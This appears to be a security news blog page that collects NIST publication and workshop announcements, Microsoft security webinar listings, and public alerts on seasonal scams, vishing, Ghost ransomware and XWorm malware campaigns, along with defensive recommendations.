My information Resource (blog.mir.net)

The NIST National Cybersecurity Center of Excellence (NCCoE), along with the SEMI Semiconductor Manufacturing Cybersecurity Consortium, has released Draft NIST Internal Report (NIST IR) 8546, Cybersecurity Framework (CSF) 2.0 Semiconductor Manufacturing Community Profile for public comment until 11:59 PM ET on Monday, April 14, 2025.

About the Draft

Draft NIST Internal Report (IR) 8546, Cybersecurity Framework 2.0 Semiconductor Manufacturing Community Profile, provides a voluntary, risk-based approach for managing cybersecurity activities and reducing cybersecurity risk to semiconductor manufacturing. The semiconductor manufacturing environment is a complex ecosystem of device makers, equipment OEMs, suppliers and solution providers. This Profile focuses on desired cybersecurity outcomes and can be used as a guideline to improve the current cybersecurity posture of the semiconductor manufacturing ecosystem.

“NIST, in collaboration with industry leaders and government agencies, has developed and is releasing a comprehensive Framework designed to safeguard semiconductor manufacturing from emerging threats and vulnerabilities,” said Sanjay Rekhi, group leader of the Security Components and Mechanisms Group at NIST. “This initiative is part of a broader, multi-year effort to strengthen the security of critical infrastructure, with a particular focus on the security of semiconductors and their supply chain.”

Comment Now!

Event Date: April 3, 2025

Event Time: 9:00 AM – 5:00 PM EST 

Event Location: Virtual and at the National Cybersecurity Center of Excellence (NCCoE)

Recent advancements in Artificial Intelligence (AI) technology bring great opportunities and challenges to organizations, including how AI can affect their cybersecurity capabilities and risks. The potential positive and negative impacts of AI need to be understood and managed.

NIST is proposing the creation of a NIST Cybersecurity Framework (CSF) Profile (Cyber AI Profile), in collaboration with the cybersecurity and AI communities, to focus on three sources of risk that impact an organization’s operational risk: Cybersecurity of AI Systems, AI-enabled Cyber Attacks, and AI-enabled Cyber Defense. 

To inform these discussions, join our upcoming workshop where we will explore ideas discussed in the newly released Cybersecurity and AI Workshop Concept Paper* through a variety of hybrid presentations and panel discussions and in-person only working sessions.

Registration for in-person attendance closes on March 27, 2025. 

Due to space limitation, registration is limited to the first 150 registrants on a first come, first served basis. 

There is no registration needed to attend virtually. Please see the link to the event page and watch the stream on April 3, 2025: https://www.nccoe.nist.gov/get-involved/attend-events/cyber-and-ai-workshop

We look forward to your participation at this event.

*Please provide any feedback using the form found on our project page before 11:59 p.m. EDT on Friday, March 14, 2025, to inform workshop topics. 

Register Now!

February 12 – Microsoft Defender XDR: How to Get the Most Out of Microsoft Defender for Vulnerability Management (MDVM)

February 18 – Setting up Microsoft Entra Verified ID, step by step.

February 18 – Microsoft Defender XDR AMA – Automatic Attack Disruption

February 19 – Security Copilot in Entra: Addressing App Risks and High-Privilege Permissions

February 19 – Microsoft Sentinel Microsoft Sentinel Repositories: Manage Your SIEM Content Like a Pro

February 25 – Microsoft Defender XDR Learn About Insider Risk Management Data in Microsoft Defender XDR

February 26 – Azure Network Security Updating Your Azure Web Application Firewall Ruleset: Common Pitfalls and How to Avoid Them

February 26 – 425 Show Security Copilot in Microsoft Entra

February 26 – Empower Admins to Protect their Environment Quickly with Risk Policy Impact Analysis

February 27 – Microsoft Entra Suite scenario deep dive​: Onboard employees easily with Microsoft Entra Suite

February 27 – Microsoft Defender XDR Licensing and Site Security in XDR

March 05 – Microsoft Defender for Cloud API Security Posture with Defender for Cloud

March 06 – Microsoft Entra Suite scenario deep dive​: Goodbye, legacy VPNs; hello, secure access to on-premises resources

March 06 – Azure Network Security Implementing Multi-Layered Security with Azure DDoS Protection and Azure WAF

Register now

As Valentine’s Day approaches, users will likely shop online, send and receive messages and e-cards, and utilize online dating platforms. However, threat actors capitalize on the season of love, tugging at users’ heartstrings and attempting to steal more than their hearts. They impersonate known and trusted organizations, major brands, contacts, such as friends and family, and potential love interests to attempt to steal personal data, financial information, account credentials, and funds.

In the past, threat actors exploited known vulnerabilities found in websites’ digital commerce platforms, such as Magento, WooCommerce, WordPress, and Shopify, or in vulnerable third-party services used by the website. Through web skimming campaigns, they targeted online retailers and shoppers to steal PII and credit card information from e-commerce websites. In a recent campaign, researchers identified a Google Tag Manager skimmer stealing credit card information from a Magento website. This campaign highlights the prevalent use of legitimate platforms to obfuscate and deploy malicious code.

Threat actors have registered legitimate domains to use as bait in Valentine’s Day-themed phishing campaigns. These domains contain keywords such as “valentine,” “love,” “gifts,” or “flowers.” The phishing emails may spoof known and trusted contacts or organizations and have themes of love, gifts, and romance, including offers too good to be true and Valentine’s Day sales or discounts. Unsuspecting victims may encounter more than a romantic surprise as threat actors use social engineering to lure them to click on malicious links, divulge sensitive data, or make fraudulent purchases.

Threat actors also engage in romance scams by creating fake profiles on online dating platforms and posing as potential love interests, building trust with their target to establish a relationship quickly. A recently reported romance scam revealed that the threat actor had built trust with their target for the target to reveal they were going through a divorce and were having financial issues. The threat actor sent purported video footage of a mailed package containing items and thousands of dollars in cash. They also claimed their military ID would be held until the package was released. Later, they informed the target that the package was supposedly stuck at the airport and threatened to extort a fee via PayPal, CashApp, or Zelle.

Additionally, the NJCCIC continues to receive reports of sextortion incidents in which victims are threatened with the release of supposed compromising or sexually explicit photos or videos if they do not pay an extortion demand. Some sextortion threats are not credible, as threat actors are unable to provide proof of such photos or videos.

The NJCCIC observed an uptick in vishing scams, a form of phishing over the phone. In these calls, threat actors attempt to gain trust and legitimacy by sharing some of the recipient’s personal data, such as name, age, and address. However, this data is typically an aggregated set of publicly available information found online. Some of this information may be outdated or pertain to a partner instead of the call recipient. The phone numbers used in vishing scams vary and change frequently, and threat actors often spoof official phone numbers to appear legitimate. Vishing calls may be persistent, and threat actors may contact potential victims multiple times daily.

Threat actors claim authority or legitimacy by impersonating various governmental agencies, financial institutions, organizations, and individuals to convince the call recipient to provide additional sensitive information, such as personally identifiable information (PII), financial information, or account credentials. They also convey urgency to extort money by persuading the call recipient to purchase fraudulent goods or services or grant access to their accounts or devices. The acquisition of additional information and this fraudulent activity can facilitate further cyberattacks.

In some instances, threat actors personally harass or threaten the call recipient or their known contacts. For example, a threat actor claimed the call recipient was responsible for a supposed accident and threatened them if they did not pay a hospital bill. In another example, the call recipient heard a woman crying in the background while a Spanish-speaking male claimed to be part of a cartel and demanded a $20,000 payment from the call recipient to keep the woman alive.

Additionally, a threat actor spoofed the phone number of the call recipient’s mother and demanded payment upon answering. If the call recipient did not make payment, the threat actor claimed they would kill the person they were supposedly holding at gunpoint. The call recipient heard crying in the background, disconnected the call, and contacted their mother on another line, confirming it was a scam. The call recipient’s sister also received a similar call spoofing their mother.

Furthermore, voice cloning technologies and artificial intelligence (AI) manipulations can be used in impersonation and extortion scams. Threat actors find and capture snippets of a person’s voice online, through social media platforms, in outgoing voicemail messages, or when the recipient caller answers a call. They can weaponize AI technology with the captured audio to clone a person’s voice and create fraudulent schemes, including family emergencies, kidnappings, robberies, or car accidents.

NIST has published Internal Report (IR) 8356, Security and Trust Considerations for Digital Twin Technology. This publication introduces the concept of a digital twin (DT), which is an electronic representation of a real-world physical (e.g., buildings, electronics, living things) or non-physical (e.g., processes, conceptual models) entity. DTs utilize existing technologies to enable a broad range of capabilities that require interoperable definitions, tools, and standards.

This document discusses key components, functions, existing modeling and simulation, and cybersecurity and trust considerations for DTs. It also provides simple examples of how to apply DT technology to real-world problems and casts a broader vision for future capabilities.

Read More

NIST has released Internal Report (IR) 8532, Workshop Report on Enhancing Security of Devices and Components Across the Supply Chain, which summarizes the presentations and discussions from a recent workshop on semiconductor security. The hybrid workshop brought together experts from industry, government, and academia to explore priorities in addressing current and emerging cybersecurity threats to semiconductors.

Experts at the event provided valuable input on NIST’s efforts in developing cybersecurity and supply chain standards, guidance, and best practices. Key topics related to semiconductor development included cybersecurity measures and metrics that leverage reference data sets for the testing, attestation, certification, verification, and validation of semiconductor components across the supply chain. The workshop also highlighted the importance of automated cybersecurity tools and techniques for securing manufacturing environments throughout the development life cycle.

Read More

This Joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released this Joint Cybersecurity Advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January.

Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.

FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.

The NIST Risk Management Framework (RMF) Team has released the initial public draft (ipd) of NIST Interagency Report (IR) 8011v1r1 (Volume 1, Revision 1), Testable Controls and Security Capabilities for Continuous Monitoring: Volume 1 — Overview and Methodology. This represents a major revision of the first and key volume in the multi-volume series.

IR 8011 provides a methodology for identifying testable controls from the Special Publication (SP) 800-53 control catalog that share common defense objectives in support of information security continuous monitoring. Volume 1 introduces key terminology and foundational concepts, describes the methodology, discusses conceptual operational considerations for a potential IR 8011 implementation, and identifies sample automatable control tests.

The public comment period is open through Friday, April 4, 2025. See the publication details for a copy of the draft and instructions for submitting comments. 

Read More

First discovered in 2022, XWorm malware is a remote access trojan (RAT) capable of evading detection and collecting sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. XWorm tracks keystrokes, captures webcam images, listens to audio input, scans network connections, and views open windows. It can also access and manipulate a computer’s clipboard, potentially stealing cryptocurrency wallet credentials. Last year, XWorm was involved in many cyberattacks, including the exploitation of CloudFlare tunnels and the delivery via a Windows script file, and the upward trend of these sophisticated RATs is already evident in 2025.   Last month, researchers discovered threat actors targeted script kiddies with a trojanized version of the XWorm RAT builder. The weaponized malware propagated through GitHub, Telegram, and file-sharing platforms to infect over 18,000 devices globally, including the United States.   The malware secretly compromised computers to deploy a backdoor to perform system reconnaissance, command execution, and data exfiltration, such as browser credentials, Discord tokens, Telegram data, and system information. Threat actors have exfiltrated over 1 GB of browser credentials from multiple computers. The malware’s “kill switch” feature was identified and leveraged to disrupt operations on infected computers.     In the past month, the NJCCIC’s email security solution identified an uptick in multiple campaigns attempting to deliver XWorm malware to New Jersey State employees to gain remote access, steal credentials, exfiltrate data, and deploy ransomware. The messages impersonate Booking.com or a customer of a hospitality organization with themes of last-minute bookings to address customer complaints, inquiries about upcoming travel plans, or issues related to past travel reservations. They display subject lines containing keywords such as reservation, booking cancellation, request for action, poor evaluation, hotel accommodation, and establishment difficulty.   The messages contain various types of URLs, such as email trackers, URL shorteners, and open redirects. There are multiple redirects and filtering techniques before arriving at one of the numerous landing pages with various layouts and scripting. The URLs for the landing pages contain keywords such as book, booking, complaint, feedback, inquiry, reportguest, and stayissueguest. The threat actors use the ClickFix technique to display dialogue boxes containing fake error messages to manipulate targets to follow instructions to “fix” the problem. Sometimes, they leverage the appearance of authenticity by using a fake CAPTCHA-themed ClickFix technique to validate the target. However, the target’s clicking copies, pastes, or executes malicious payloads or scripts in the background. The payloads use PowerShell or MSHTA commands to download and execute XWorm malware.   Recommendations   Refrain from responding to unsolicited communications, clicking links, or opening attachments from unknown senders. Exercise caution with communications from known senders. Confirm requests from senders via contact information obtained from verified and official sources. Type official website URLs into browsers manually and only submit account credentials or sensitive information on official websites. Use strong, unique passwords for all accounts and enable multi-factor authentication (MFA) where available, choosing authentication apps or hardware tokens over SMS text-based codes. Reduce your digital footprint so threat actors cannot easily target you. Keep systems up to date and apply patches after appropriate testing.